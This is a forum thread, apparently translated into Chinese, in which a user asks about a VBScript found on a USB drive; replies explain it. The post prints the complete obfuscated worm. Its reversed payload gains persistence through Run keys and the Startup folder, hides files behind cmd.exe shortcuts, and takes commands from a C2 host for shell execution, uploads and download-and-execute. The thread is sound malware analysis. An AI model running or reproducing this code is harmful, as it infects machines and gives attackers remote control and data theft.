2015-10-27 70 views

該文件似乎是病毒。有人可以幫忙分析一下我在閃存盤(U盤)中找到的這個VB腳本文件嗎?

閃存盤中與該腳本文件放在一起的真實文件都被隱藏了,並各自對應一個 .lnk 文件;這些 .lnk 文件在打開原文件的同時也會運行腳本。

防病毒軟件報出了 VBS/LNK.JENXCUS.Gen 木馬警報。

這段代碼是做什麼的?即使我刪除了它,它仍會在啓動文件夾中重新創建一個副本。

' NOTE(analysis): obfuscated loader. The executable VBScript is stored back-to-front
' as text in zvn; bnowmx() reverses it and the result is passed to ExecuteGlobal.
' Treat this listing as a live sample: read it as text, do not run it with wscript/cscript.

' zvn accumulates the reversed payload text, piece by piece, inside bnowmx().
Dim zvn 
' dnqeqvrrc_ receives the payload once it has been reversed back into readable order.
Dim dnqeqvrrc_ 
' xs is a single double-quote character, spliced in wherever the payload needs a quote.
xs=("""") 
' n is a CR/LF line break, spliced in between the payload's statements.
n=(vbcrlf) 
Function bnowmx() 

zvn=zvn&""&n&"noitcnuf dne"&n&"ynamorflladaer = llehsdmc"&n&"fi dne"&n&""&xs&""&xs&" = ynamorflladaer"&n&" esle"&n&"lladaer.rredts.cexeo = ynamorflladaer"&n&"neht maertsfodneta.rredts.cexeo ton fiesle"&n&"lladaer.tuodts.cexeo = ynamorflladaer"&n&"neht maertsfodneta.tuodts.cexeo ton fi"&n&")dmc & "&xs&" c/ %cepsmoc%"&xs&"(cexe.jbollehs = cexeo tes"&n&"ynamorflladaer,cexeo,jboptth mid"&n&")dmc(llehsdmc noitcnuf"&n&"bus dne"&n&"lru redlofeteled.jbo" 
zvn=zvn&"metsyselif"&n&"lru elifeteled.jbometsyselif"&n&"txen emuser rorre no"&n&")lru(fafeteled bus"&n&"bus dne"&n&"eurt,7,dip & "&xs&" DIP/ T/ F/ llikksat"&xs&" nur.jbollehs"&n&"txen emuser rorre no"&n&")dip(ssecorptixe bus"&n&"noitcnuf dne"&n&"txen"&n&"retilps & htapelbatucexe.metijbo & ssecorpmune = ssecorpmune"&n&""&xs&"|"&xs&" & dissecorp.metijbo & ssecorpmune = ssecorpmune "&n&""&xs&"|"&xs&" & eman.metijbo & ssecorpmune = ssecorpmune "&n&"smetiloc ni metijbo hcae rof"&n&"metijbo mid"&n&")84,,"&xs&"ssecorp_23niw morf * tceles"&xs&"(yreuqcexe.ecivresimwjbo = smetiloc tes"&n&")"&xs&"2vmic\toor\.\\:stmgmniw"&xs&"(tcejboteg = ecivresimwjbo tes"&n&"txen emuser rorre no"&n&")(ssecorpmune noitcnuf"&n&"noitcnuf dne"&n&"txen"&n&"retilps & setubirtta.elif & "&xs&"|"&xs&" & "&xs&"f"&xs&" & "&xs&"|"&xs&" & ezis.elif & "&xs&"|"&xs&" & eman.elif & fafmune = fafmune"&n&"selif.)ridmune(redlofteg.jbometsyselif ni elif hcae rof"&n&"txen"&n&"retilps & setubirtta.redlof & "&xs&"|"&xs&" & "&xs&"d"&xs&" & "&xs&"|"&xs&" & "&xs&""&xs&" & "&xs&"|"&xs&" & eman.redlof & fafmune = fafmune"&n&"sredlofbus.)ridmune(redlofteg.jbometsyselif ni redlof hcae rof"&n&"retilps & ridmune = fafmune"&n&")ridmune(fafmune noitcnuf"&n&"noitcnuF dne"&n&"txen"&n&"fi dne"&n&"retilps & epytevird.evird & "&xs&"|"&xs&" & htap.evird & revirdmune = revirdmune"&n&"neht eurt = ydaersi.evird fi"&n&"sevird.jbometsyselif ni evird hcae rof"&n&")(revirdmune noitcnuf"&n&"noitcnuf dne"&n&"reffub dnes.jboptth"&n&"eslaf ,lruelif & retilps & "&xs&"gnivcer-si"&xs&" & "&xs&"/"&xs&"& trop & "&xs&":"&xs&" & tsoh & "&xs&"//:ptth"&xs&","&xs&"tsop"&xs&" nepo.jboptth"&n&")"&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = jboptth tes"&n&"gni" 
zvn=zvn&"hton = daolnwodmaertsjbo tes"&n&"htiw dne"&n&"esolc. "&n&"daer. = reffub  "&n&"lruelif elifmorfdaol. "&n&"nepo."&n&" 1 = epyt."&n&" edaolpumaertsjbo htiw"&n&")"&xs&"maerts.bdoda"&xs&"(tcejboetaerc = edaolpumaertsjbo tes"&n&"reffub,edaolpumaertsjbo,jboptth mid"&n&")lruelif(daolpu noitcnuf"&n&"bus dne"&n&" fi dne"&n&"htaptrohs.)otevasrts(elifteg.daolnwodosfjbo nur.jbollehs"&n&"neht)otevasrts(stsixeelif.daolnwodosfjbo fi"&n&"fi dne"&n&"gnihton = daolnwodmaertsjbo tes"&n&"htiw dne "&n&"esolc.   "&n&"otevasrts elifotevas.  "&n&"ydobesnopser.daolnwodptthjbo etirw.  "&n&"nepo.  "&n&" 1 = epyt.   "&n&" daolnwodmaertsjbo htiw"&n&")"&xs&"maerts.bdoda"&xs&"(tcejboetaerc = daolnwodmaertsjbo tes "&n&"daolnwodmaertsjbo mid"&n&"neht 002 = sutats.daolnwodptthjbo fi"&n&"fi dne"&n&")otevasrts(elifeteled.daolnwodosfjbo"&n&"neht)otevasrts(stsixeelif.daolnwodosfjbo fi"&n&")"&xs&"tcejbometsyselif.gnitpircs"&xs&"(tcejboetaerc = daolnwodosfjbo tes"&n&"  "&n&""&xs&""&xs&" dnes.daolnwodptthjbo"&n&"eslaf ,lruelif & retilps & "&xs&"gnidnes-si"&xs&" & "&xs&"/"&xs&"& trop & "&xs&":"&xs&" & tsoh & "&xs&"//:ptth"&xs&","&xs&"tsop"&xs&" nepo.daolnwodptthjbo"&n&")"&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = daolnwodptthjbo tes"&n&")1 +)"&xs&"\"&xs&",lruelif(verrtsni ,lruelif(dim & ridelif = otevasrts"&n&"fi dne"&n&"ridllatsni = ridelif"&n&" neht "&xs&""&xs&" = ridelif fi"&n&")ridelif,lruelif(daolnwod bus"&n&"bus dne"&n&" fi dne"&n&"htaptrohs.)otevasrts(elifteg.daolnwodosfjbo nur.jbollehs"&n&"neht)otevasrts(stsixeelif.daolnwodosfjbo fi"&n&"fi dne"&n&"gnihton = daolnwodmaertsjbo tes"&n&"htiw dne"&n&"esolc.  "&n&"otevasrts elifote" 
zvn=zvn&"vas.  "&n&"ydobesnopser.daolnwodptthjbo etirw.  "&n&"nepo.  "&n&" 1 = epyt.  "&n&"daolnwodmaertsjbo htiw"&n&")"&xs&"maerts.bdoda"&xs&"(tcejboetaerc = daolnwodmaertsjbo tes"&n&"daolnwodmaertsjbo mid"&n&"neht 002 = sutats.daolnwodptthjbo fi"&n&" "&n&"fi dne"&n&")otevasrts(elifeteled.daolnwodosfjbo"&n&"neht)otevasrts(stsixeelif.daolnwodosfjbo fi"&n&")"&xs&"tcejbometsyselif.gnitpircs"&xs&"(tcejboetaerc = daolnwodosfjbo tes"&n&"dnes.daolnwodptthjbo"&n&"eslaf ,knilrts ,"&xs&"teg"&xs&" nepo.daolnwodptthjbo"&n&") "&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = daolnwodptthjbo tes"&n&"emanelif & ridllatsni = otevasrts"&n&"lruelif = knilrts"&n&")emanelif,lruelif(redaolnwodetis bus"&n&"noitcnuf dne"&n&"tiuq.tpircsw neht 0 > rebmun.rre fi"&n&")eslaf ,8, emanllatsni & ridllatsni(eliftxetnepo.jbometsyselif = ecnoeno tes"&n&"raelc.rre"&n&"fI dne"&n&" tiuq.tpircsw"&n&")43(rhC & emanllatsni & ridllatsni &)43(rhc & "&xs&" B// exe.tpircsw"&xs&" nur.jbollehs"&n&" neht)htaptrohs.trohsemanllufllatsni(esacl ><)htaptrohs.trohsemanlluftpircs(esacl fi"&n&")emanllatsni & ridllatsni(elifteg.jbometsyselif = trohsemanllufllatsni tes"&n&")emanlluftpircs.tpircsw(elifteg.jbometsyselif = trohsemanlluftpircs tes"&n&"tratspu"&n&"fI dne"&n&"fi dne"&n&""&xs&"ZS_GER"&xs&" ,gnidaerpsbsu ,"&xs&"\"&xs&" & )0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" etirwger.jbollehs"&n&"etad & "&xs&" - eslaf"&xs&" = gnidaerpsbsu"&n&"esle"&n&""&xs&"ZS_GER"&xs&" ,gnidaerpsbsu ,"&xs&"\"&xs&" & )0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" etirwger.jbollehs"&n&"etad" 
zvn=zvn&" & "&xs&" - eurt"&xs&" = gnidaerpsbsu"&n&"neht)emanllatsni(esacl & "&xs&"\:"&xs&" =))2,emanlluftpircs.tpircsw(dim (esacl fi"&n&"neht "&xs&""&xs&" = gnidaerpsbsu fi"&n&")"&xs&"\"&xs&" &)0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"(daerger.jbollehs = gnidaerpsbsu"&n&"txen emuser rorre no"&n&"ecnatsni noitcnuf"&n&"noitcnuf dne"&n&""&xs&"va-nan"&xs&" = ytiruces neht "&xs&""&xs&" = ytiruces fi"&n&"txen"&n&""&xs&". "&xs&" & emanyalpsid.surivitnajbo & ytiruces = ytiruces"&n&"surivitnaloc ni surivitnajbo hcae rof"&n&")0,"&xs&"lqw"&xs&","&xs&"tcudorpsurivitna morf * tceles"&xs&"(yreuqcexe.retnecytirucesjbo = surivitnaloc teS"&n&")cs & "&xs&"\toor\tsohlacol\\:stmgmniw"&xs&"(tcejboteg = retnecytirucesjbo tes"&n&""&xs&"retnecytiruces"&xs&" = cs esle "&xs&"2retnecytiruces"&xs&" = cs neht 6 > noisrevso fi"&n&")noisrevso(lave = noisrevso"&n&"txen"&n&")i(rtsnoisrev & noisrevso = noisrevso "&n&")rtsnoisrev(dnuobu ot 1 = x rof"&n&""&xs&"."&xs&" &)0(rtsnoisrev = noisrevso"&n&")"&xs&"."&xs&",noisrev.smetiloc(tilps = rtsnoisrev"&n&"txen"&n&")"&xs&"."&xs&",noisrev.metijbo(tilps = rtsnoisrev"&n&"smetiloc ni metijbo hcae rof"&n&")84,,"&xs&"metsysgnitarepo_23niw morf * tceles"&xs&"(yreuqcexe.ecivresimwjbo = smetiloc tes"&n&")"&xs&"2vmic\toor\.\\!}etanosrepmi=levelnoitanosrepmi{:stmgmniw"&xs&"(tcejboteg = ecivresimwjbo tes"&n&""&xs&""&xs&" = ytiruces"&n&"txen emuser rorre no"&n&" ytiruces noitcnuf"&n&"noitcnuf dne"&n&"txen"&n&"fi dne"&n&"rof tixe"&n&"rebmunlairesemulov.ksid = diwh"&n&"neht "&xs&""&xs&" >< rebmunlairesemulov.ksid fi"&n&"sksid ni ksid hcae rof"&n&")"&xs&"ksidlacigol_23niw morf * tceles"&xs&"(yreuqcexe.toor = sksid tes"&n&")" 
zvn=zvn&""&xs&"2vmic\toor\.\\!}etanosrepmi=levelnoitanosrepmi{:stmgmniw"&xs&"(tcejboteg = toor tes"&n&"txen emuser rorre no"&n&"diwh noitcnuf"&n&"bus dne"&n&"eurt, emanllatsni & putrats,emanlluftpircs.tpircsw elifypoc.jbometsyselif"&n&"eurt,emanllatsni & ridllatsni,emanlluftpircs.tpircsw elifypoc.jbometsyselif"&n&""&xs&"ZS_GER"&xs&" ,)43(wrhc & emanllatsni & ridllatsni &)43(wrhc & "&xs&" B// exe.tpircsw"&xs&" ,)0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" etirwger.jbollehs"&n&""&xs&"ZS_GER"&xs&" ,)43(wrhc & emanllatsni & ridllatsni &)43(wrhc & "&xs&" B// exe.tpircsw"&xs&" ,)0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\RESU_TNERRUC_YEKH"&xs&" etirwger.jbollehs"&n&"txeN emuser rorre no"&n&")(tratspu bus"&n&"noitcnuf dne"&n&"fi dne"&n&"fni = noitamrofni"&n&"esle"&n&" fni = noitamrofni"&n&"gnidaerpsbsu & fni = fni"&n&"retilps & ytiruces & fni = fni"&n&"retilps & "&xs&"sulp"&xs&" & fni = fni"&n&"txen"&n&"rof tixe"&n&" retilps & noitpac.ofniso & fni = fni"&n&"so ni ofniso hcae rof"&n&")"&xs&"metsysgnitarepo_23niw morf * tceles"&xs&"(yreuqcexe.toor = so tes"&n&")"&xs&"2vmic\toor\.\\!}etanosrepmi=levelnoitanosrepmi{:stmgmniw"&xs&"(tcejboteg = toor tes"&n&"retilps &)"&xs&"%emanresu%"&xs&"(sgnirtstnemnorivnednapxe.jbollehs & fni = fni"&n&" retilps &)"&xs&"%emanretupmoc%"&xs&"(sgnirtstnemnorivnednapxe.jbollehs & fni = fni"&n&" retilps & diwh = fni"&n&"neht "&xs&""&xs&" = fni fi"&n&"txen emuser rorre no"&n&"noitamrofni noitcnuf"&n&"noitcnuf dne"&n&"txetesnopser.jboptth =" 
zvn=zvn&" tsop"&n&"marap dnes.jboptth"&n&"noitamrofni,"&xs&":tnega-resu"&xs&" redaehtseuqertes.jboptth"&n&"eslaf ,dmc & "&xs&"/"&xs&"& trop & "&xs&":"&xs&" & tsoh & "&xs&"//:ptth"&xs&","&xs&"tsop"&xs&" nepo.jboptth"&n&"marap = tsop"&n&")marap, dmc(tsop noitcnuf"&n&"bus dne"&n&"tiuq.tpircsw"&n&"txen"&n&"fi dne"&n&"fi dne"&n&"fi dne"&n&"txen"&n&"0 = setubirtta.redlof"&n&"sredlofbus.) "&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni redlof hcae rof"&n&"txen"&n&"fi dne"&n&"fi dne"&n&")htap.elif(elifeteled.jbometsyselif"&n&"esle"&n&"fI dne"&n&")eman.elif & "&xs&"\"&xs&" & htap.evird(elifeteled.jbometsyselif"&n&"esle"&n&") "&xs&"knl."&xs&" &)0(emanelif & "&xs&"\"&xs&" & htap.evird(elifeteled.jbometsyselif"&n&")"&xs&"."&xs&",eman.elif(tilps = emanelif"&n&"neht)emanllatsni(esacu ><)eman.elif(esacu fi"&n&"0 = setubirtta.elif"&n&"neht "&xs&"knl"&xs&" ><))))"&xs&"."&xs&" ,eman.elif(tilps(dnuobu()"&xs&"."&xs&" ,eman.elif(tilps(esacl fi"&n&"neht)"&xs&"."&xs&",eman.elif(rtsni fi"&n&"txen emuser rorre no"&n&"selif.)"&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni elif hcae rof"&n&"neht 1 = epytevird.evird fi"&n&"neht 0 > ecapseerf.evird fi"&n&"neht eurt = ydaersi.evird fi"&n&"sevird.jbometsyselif ni evird hcae rof"&n&"eurt, emanlluftpircs.tpircsw elifeteled.jbometsyselif"&n&"eurt, emanllatsni & putrats elifeteled.jbometsyselif"&n&")0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" eteledger.jbollehs"&n&")0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\RESU_TNERRUC_YEKH"&xs&" eteledger.jbollehs"&n&"emanredlof mid"&n&"emanelif mid"&n&"txen e" 
zvn=zvn&"muser rorre no"&n&"llatsninu bus"&n&"bus dne"&n&"raelc.rre"&n&"txen"&n&"fi dne"&n&"fI dne"&n&"fI dne"&n&"txen"&n&")(evas.jboknl"&n&"fi dne"&n&"nociredlof = noitacolnoci.jboknl"&n&" esle"&n&"htap.redlof = noitacolnoci.jboknl"&n&"neht 0 =)"&xs&","&xs&",nociredlof(rtsni fi"&n&")"&xs&"\nocitluafed\redlof\sessalc\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"(daerger.jbollehs = nociredlof"&n&""&xs&"tixe&"&xs&"&))43(wrhc & "&xs&" "&xs&" &)43(wrhc ,"&xs&" "&xs&",eman.redlof(ecalper & "&xs&" rerolpxe trats&"&xs&" &))43(wrhc & "&xs&" "&xs&" &)43(wrhc ,"&xs&" "&xs&",emanllatsni(ecalper & "&xs&" trats c/"&xs&" = stnemugra.jboknl"&n&""&xs&""&xs&" = yrotceridgnikrow.jboknl"&n&""&xs&"exe.dmc"&xs&" = htaptegrat.jboknl"&n&"7 = elytswodniw.jboknl"&n&")"&xs&"knl."&xs&" & emanredlof & "&xs&"\"&xs&" & htap.evird(tuctrohsetaerc.jbollehs = jboknl tes"&n&"eman.redlof = emanredlof"&n&"4+2 = setubirtta.redlof"&n&"rof tixe neht redlofknl ton fi"&n&"sredlofbus.) "&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni redlof hcae rof"&n&"txen"&n&"fi dne"&n&"fi dne"&n&"fi dne"&n&")(evas.jboknl"&n&"fi dne"&n&"nocielif = noitacolnoci.jboknl"&n&" esle"&n&"htap.elif = noitacolnoci.jboknl"&n&"neht 0 =)"&xs&","&xs&",nocielif(rtsni fi"&n&")"&xs&"\nocitluafed\"&xs&" &)"&xs&"\"&xs&" &)))"&xs&"."&xs&" ,eman.elif(tilps(dnuobu()"&xs&"."&xs&" ,eman.elif(tilps & "&xs&".\sessalc\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"(daerger.jbollehs & "&xs&"\sessalc\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"(daerger.jbollehs = nocielif"&n&""&xs&"tixe&"&xs&"&))43(wrhc & "&xs&" "&xs&" &)43(wrhc ,"&xs&" "&xs&",eman.elif(ecalper & "&xs&" trats&"&xs&" &))43(wrhc & "&xs&" "&xs&" &)43(wrhc ,"&xs&" "&xs&",emanllatsni(ecalper & "&xs&" trats c/"&xs&" = stnemugra.jboknl"&n&""&xs&""&xs&" = yrotceridgnikrow.jboknl"&n&""&xs&"ex" 
zvn=zvn&"e.dmc"&xs&" = htaptegrat.jboknl"&n&"7 = elytswodniw.jboknl"&n&")"&xs&"knl."&xs&" &)0(emanelif & "&xs&"\"&xs&" & htap.evird(tuctrohsetaerc.jbollehs = jboknl tes"&n&")"&xs&"."&xs&",eman.elif(tilps = emanelif"&n&"neht)emanllatsni(esacu ><)eman.elif(esacu fi"&n&"4+2 = setubirtta.elif"&n&"neht "&xs&"knl"&xs&" ><))))"&xs&"."&xs&" ,eman.elif(tilps(dnuobu()"&xs&"."&xs&" ,eman.elif(tilps(esacl fi"&n&"neht)"&xs&"."&xs&",eman.elif(rtsni fi"&n&"rof tixe neht elifknl ton fi"&n&"seliF.) "&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni elif hcae rof"&n&"fi dne"&n&"4+2 = setubirtta.)emanllatsni & "&xs&"\"&xs&" & htap.evird(elifteg.jbometsyselif"&n&"neht )emanllatsni & "&xs&"\"&xs&" & htap.evird(stsixeelif.jbometsyselif fi"&n&"eurt,emanllatsni & "&xs&"\"&xs&" & htap.evird , emanlluftpircs.tpircsw elifypoc.jbometsyselif"&n&"neht 1 = epytevird.evird fi"&n&"neht 0 > ecapseerf.evird fi"&n&"neht eurt = ydaersi.evird fi"&n&"sevird.jbometsyselif ni evird hcae rof"&n&"tratspu"&n&"nociredlof mid"&n&"nocielif mid"&n&"emanredlof mid"&n&"emanelif mid"&n&"jboknl mid"&n&"txen emuser rorre no"&n&"llatsni bus"&n&"dnew"&n&"peels peels.tpircsw"&n&"tceles dne"&n&"  )marap(lave = peels"&n&")1(dmc = marap"&n&""&xs&"peels"&xs&" esac"&n&")marap(ssecorptixe"&n&")1(dmc = marap"&n&""&xs&"ssecorp-tixe"&xs&" esac"&n&")marap(fafeteled"&n&")1(dmc = marap"&n&""&xs&"eteled"&xs&" esac"&n&" )marap(llehsdmc,"&xs&"llehs-dmc-si"&xs&" tsop"&n&")1(dmc = marap"&n&""&xs&"llehs-dmc"&xs&" esac"&n&" ssecorpmune,"&xs&"ssecorp-mune-si"&xs&" tsop"&n&""&xs&"ssecorp-mune"&xs&" esac"&n&")marap(fafmune,"&xs&"faf-mune-si"&xs&" tsop"&n&")1(dmc = marap"&n&""&xs&"faf-mune"&xs&" esac"&n&" revirdmune,"&xs&"revir" 
zvn=zvn&"d-mune-si"&xs&" tsop"&n&""&xs&"revird-mune"&xs&" esac"&n&")marap(daolpu"&n&")1(dmc = marap"&n&""&xs&"vcer"&xs&" esac"&n&")2(dmc,)1(dmc redaolnwodetis"&n&""&xs&"dnes-etis"&xs&" esac"&n&")2(dmc,)1(dmc daolnwod"&n&""&xs&"dnes"&xs&" esac"&n&"llatsninu"&n&""&xs&"llatsninu"&xs&" esac"&n&" tiuq.tpircsw"&n&")43(rhc & emanllatsni & ridllatsni &)43(rhc & "&xs&" B// exe.tpircsw"&xs&" nur.jbollehs"&n&"esolc.ecnoeno"&n&"marap etirw.ecnoeno"&n&")eslaf ,2, emanllatsni & ridllatsni(eliftxetnepo.jbometsyselif = ecnoeno tes"&n&"esolc.ecnoeno"&n&")1(dmc = marap"&n&""&xs&"etadpu"&xs&" esac"&n&"marap etucexe"&n&")1(dmc = marap"&n&""&xs&"etucecxe"&xs&" esac"&n&")0(dmc esac tceles"&n&")retilps,esnopser(tilps = dmc"&n&")"&xs&""&xs&","&xs&"ydaer-si"&xs&"(tsop = esnopser"&n&""&xs&""&xs&" = esnopser"&n&"llatsni"&n&"eurt elihw"&n&"ecnatsni"&n&"txen emuser rorre no"&n&"ecnoeno mid"&n&""&xs&""&xs&" = etadtrats"&n&""&xs&""&xs&" = gnidaerpsbsu"&n&""&xs&""&xs&" = ofni"&n&"marap mid"&n&"dmc mid"&n&"esnopser mid"&n&" 0005 = peels"&n&""&xs&">"&xs&" & "&xs&"|"&xs&" & "&xs&"<"&xs&" = retilps"&n&""&xs&"\"&xs&" &)"&xs&"%pmet%"&xs&"(sgnirtstnemnorivnednapxe.jbollehs = ridllatsni neht)ridllatsni(stsixeredlof.jbometsyselif ton fi"&n&""&xs&"\"&xs&" &)ridllatsni(sgnirtstnemnorivnednapxe.jbollehs = ridllatsni"&n&""&xs&"\"&xs&" &)"&xs&"putrats"&xs&"(sredloflaiceps.jbollehs = putrats"&n&"emantpircs.tpircsw = emanllatsni"&n&")"&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = jboptth tes"&n&"jboptth mid"&n&")"&xs&"tcejbometsyselif.gnitpircs"&xs&"(tcejboetaerc = jbometsyselif tes"&n&"jbometsyselif mid"&n&")"&xs&"llehs.tpircsw"&xs&"(tcejboetaerc.tpircsw = jbollehs tes"&n&" jbollehs mid"&n&"eurt = redlofknl"&n&"eurt = elifknl"&n&""&xs&"%pmet%"&xs&" = ridllatsni"&n&"7711 = trop"&n&""&xs&"zib.pi-on.naybil"&xs&" = tsoh"&n&"reDoCXdaME'" 

' Decoding step: walk zvn from its last character to its first, appending one
' character at a time, so dnqeqvrrc_ ends up holding zvn reversed (the readable payload).
for azcujbz=(((len)(zvn)))to(1)Step(-1) 
ypqmwkll=(mid(zvn,azcujbz,1)) 
' szauuy_l_vr is never assigned anywhere in this listing, so it concatenates as an
' empty string; it appears to be filler added by the obfuscator.
dnqeqvrrc_=(dnqeqvrrc_&ypqmwkll&szauuy_l_vr) 
next 
' Return the reversed (decoded) text to the caller.
bnowmx=dnqeqvrrc_ 
End Function 
' This is the point where the decoded payload runs: the string returned by bnowmx()
' is handed to ExecuteGlobal. For static analysis in an isolated VM, write the return
' value of bnowmx() to a text file instead of executing it.
' Indicators readable from the reversed payload text in this listing:
'   - C2 host libyan.no-ip.biz, port 1177, contacted with HTTP POST via MSXML2.XMLHTTP
'   - HKCU and HKLM ...\CurrentVersion\Run values launching "wscript.exe //B" on a copy
'     of the script in %TEMP%, plus a second copy in the user's Startup folder
'   - on removable drives (drivetype = 1): files/folders set to hidden+system (2+4) and
'     .lnk shortcuts whose target is cmd.exe ("/c start <script>&start <original>&exit")
Executeglobal(cstr(bnowmx())) 
'EMadXCoDer,www.dev-point.com 

我投票以「偏離主題」爲由關閉這個問題,因爲它不是一個關於編程的問題。 – Smandoli


可能是惡意的,但不一定;它只是被嚴重混淆了。儘管如此,我仍然同意。 – CollinD


它先生成一個字符串,然後將其反轉,再執行反轉後的字符串。您可以把 executeglobal 換成消息框,以查看即將執行的代碼。但這不是重點!重點是已經太晚了。如果刪除之後它還會不斷被重新創建,那麼您的系統已經受到感染。 –

回答


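該代碼將自身安裝到用戶的啓動文件夾中,然後設置兩個 Run 註冊表項,以便在機器啓動時執行該腳本。運行時,腳本會進入一個無限循環。每次循環它都會重新安裝自己,然後打開一個到 libyan.no-ip.biz 的連接(從腳本文本看,端口爲 1177,通過 MSXML2.XMLHTTP 發送 HTTP POST)並請求指令。這也解釋了爲什麼刪除啓動文件夾中的副本後它又會出現:只要腳本進程仍在運行,下一次循環就會重新複製。返回的指令可以有很多種,包括讓腳本發送驅動器上的信息,或下載並執行任意代碼。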
